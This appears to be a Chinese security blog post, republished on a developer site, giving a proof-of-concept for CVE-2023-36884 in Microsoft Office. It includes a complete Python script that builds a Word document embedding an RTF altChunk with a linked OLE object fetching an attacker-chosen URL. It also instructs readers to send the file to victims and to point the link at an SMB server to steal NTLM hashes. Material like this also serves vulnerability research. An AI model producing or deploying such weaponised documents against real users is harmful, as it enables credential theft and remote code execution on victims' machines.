CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE
Khan安全团队
发布于 2024-01-08 03:04:15
发布于 2024-01-08 03:04:15
代码可运行
运行总次数:0
代码可运行
该漏洞允许攻击者通过精心制作的 Office 开放可扩展标记语言 (OOXML) 文档来利用 Windows 搜索文件。
安装 PIP 包:
pip install python-docx pywin32 创建 example.html 文件并启动 Python HTTP Web 服务器:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888然后,运行脚本:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html现在,生成的文件可以通过电子邮件或其他方式与受害者共享。该链接可以指向您的 SMB 服务器以窃取受害者的 NTLM 哈希值,也可以指向包含 iframe 的 HTML 文件,该 iframe 引用了 Windows 搜索文件,就像原始恶意软件中一样。由于缺乏进一步的信息,无法显示确切的利用情况。
# pip install python-docx pywin32
import sys
import os
from docx import Document
from docx.oxml.parser import OxmlElement
from docx.oxml.ns import qn
from docx.opc.part import Part
from docx.opc.constants import RELATIONSHIP_TYPE as RT
import win32com.client as win32
# Get or create a DOCX document
def get_doc(docx_file_path):
if not os.path.isfile(docx_file_path):
doc = Document()
doc.save(docx_file_path)
print(f"[+] Created a new DOCX document with name '{docx_file_path}'.")
else:
doc = Document(docx_file_path)
print(f"[+] Using an existing DOCX document with name '{docx_file_path}'.")
return doc
# Check if the RTF file exists, and create it if it doesn't
def check_rtf_exists(rtf_file_path):
if not os.path.isfile(rtf_file_path):
gen_new_rtf(rtf_file_path)
print(f"[+] Created a new RTF document with name '{rtf_file_path}'.")
else:
print(f"[+] Using an existing RTF document with name '{rtf_file_path}'.")
# Generate a new RTF file with default content
def gen_new_rtf(rtf_file_path):
try:
with open(rtf_file_path, 'w') as file:
rtf_example_code = "{\\rtf1\\ansi\\deff0}"
file.write(rtf_example_code)
except Exception as e:
print(f"[-] Cannot create the RTF file. Error: {str(e)}")
sys.exit(1)
# Update the RTF file by adding '\objupdate' after '\objautolink'
def update_rtf_with_objupdate(file_path):
try:
with open(file_path, 'r') as file:
# Read the content of the file
file_content = file.read()
# Replace "\objautolink" with "\objautolink\objupdate"
updated_content = file_content.replace(r'\objautlink', r'\objautlink\objupdate')
with open(file_path, 'w') as file:
# Write the updated content back to the file
file.write(updated_content)
print(f"[+] '\objupdate' added after '\objautolink' in '{file_path}'.")
except Exception as e:
print(f"[-] An error occurred: {str(e)}")
# Add an RTF file as an altChunk to a DOCX document
def add_rtf_as_alt_chunk_to_doc(doc, rtf_path):
try:
package = doc.part.package
partname = package.next_partname('/word/altChunk%d.rtf')
# Read the RTF content from the file
with open(rtf_path, 'rb') as rtf_file:
rtf_content = rtf_file.read()
alt_part = Part(partname, 'application/rtf', rtf_content, package)
r_id = doc.part.relate_to(alt_part, RT.A_F_CHUNK)
alt_chunk = OxmlElement('w:altChunk')
alt_chunk.set(qn('r:id'), r_id)
doc.element.body.sectPr.addprevious(alt_chunk)
print("[+] RTF file added as altChunk.")
# Save the modified document
doc.save(docx_file_path)
update_rtf_with_objupdate(rtf_path)
except Exception as e:
print(f"[-] Can not add the RTF file as altChunk to the DOC. Error: {str(e)}")
sys.exit(1)
# Add a linked OLE object with a URL to the RTF file
def add_linked_ole_object_with_url(rtf_path, url):
try:
word = win32.Dispatch("Word.Application")
doc = word.Documents.Open(os.path.abspath(rtf_path))
doc.Activate()
# Insert the linked OLE object with an external URL
ole_shape = doc.Shapes.AddOLEObject(
ClassType="Package",
FileName=url, # Use the URL as the FileName
LinkToFile=True, # Create a linked object
DisplayAsIcon=True,
Left=100, Top=100, Width=100, Height=100
)
# Save the document
doc.Save()
# Close the document and Word application
doc.Close()
word.Quit()
print(f"[+] Linked OLE object with URL added to '{rtf_path}'.")
except Exception as e:
print(f"[-] Cannot add a linked OLE object to the RTF file. Error: {str(e)}")
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python generate_rtf_with_autolink.py <doc_file> <rtf_file> <ole_objects_url>")
sys.exit(1)
# Get arguments
docx_file_path = sys.argv[1]
rtf_file_path = sys.argv[2]
url = sys.argv[3]
# Check if the DOCX file exists, if not, create one
doc = get_doc(docx_file_path)
# Check if the RTF file exists, if not, create one
check_rtf_exists(rtf_file_path)
# Add a linked OLE object to RTF with an external URL
add_linked_ole_object_with_url(rtf_file_path, url)
# Add the RTF file to the DOCX as an altChunk
add_rtf_as_alt_chunk_to_doc(doc, rtf_file_path)
print(f"[+] RTF file '{rtf_file_path}' added as altChunk to '{docx_file_path}'.")本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-01-02,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
推荐阅读
相关推荐
python实现文档智能化合并功能
更多 >
腾讯云开发者
